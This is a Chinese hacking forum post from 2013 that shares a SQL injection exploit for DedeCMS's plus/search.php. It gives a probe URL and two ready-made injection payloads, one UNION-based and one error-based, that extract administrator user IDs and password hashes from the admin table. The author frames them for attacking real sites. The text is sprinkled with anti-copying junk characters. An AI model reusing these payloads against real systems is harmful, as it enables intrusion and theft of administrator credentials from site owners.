找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2063|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ1 a% J7 u( H; Y+ G3 t

( |* C2 t: v2 O- o: A: k哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
1 t5 v) z; x6 @# g! H! Z# ^# q1 G# q; H# q& v$ z" q: v
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。( S' w* l' H+ M! |" J. O/ o
! r9 W  T9 J  |+ j4 O
我一般是这样测试的:
% S( p- K+ R+ W( O/ a+ O& j  G
0 g$ N5 g  C; E  g1 g提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
9 o. ~/ W5 I( s& r$ B. F' H) W
- v& @( P+ Q0 A$ C/ t5 r* A转载不加作者名的没JJ
9 @' V4 R/ N! q
3 e6 M* s$ I7 |  H3 p作者:鬼哥
0 g2 u  q3 X1 j/ k7 V+ r' k8 d7 g6 D" C' x# J( }

% I4 @- d3 F, n" i* R/ h9 ?# ?
) v" X' b5 K2 d# M* X看结果如果提示/ a  [3 Z; t' d5 j- {8 i

: w1 A6 G, C0 d( \( ?1 X+ {- M1 b# DSafe Alert: Request Error step 2 !
; H! w: |0 g' A- w3 }4 R3 F8 x$ ?1 Q& {" h
那么直接用下面的exp: [: ]( O  j! }" P# E/ r. y5 U
; e5 D: x7 h4 w' ~7 X) J$ P+ K5 X8 O
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
9 R( m8 D6 a# K( {3 n* h, R
/ J2 K3 _& |6 l* X9 s) |/ V4 r5 |2 i0 ], H" E+ x& n
看结果如果提示7 @5 b& ?. E! \/ j% O1 C: ~

8 k" v( e- U1 b# WSafe Alert: Request Error step 1 !! U! D; P/ f% P- b) L. I
3 P# u# ?; r7 N* h# e$ m
那么直接用下面的exp5 _6 R' L% R* M: n+ M- ~
7 M& ^" F1 ?2 T* _" }( f! {! g
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
. `: i6 `; p6 S# i6 a" _6 s* q6 x6 G! b

) }) x& y) d/ E2 i6 O1 B如果正常显示证明漏洞不存在了。# {( q7 H, S3 a  b( d7 x; [. Z7 K* m& j

0 h6 y  }- j* D. ]0 ?; U转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表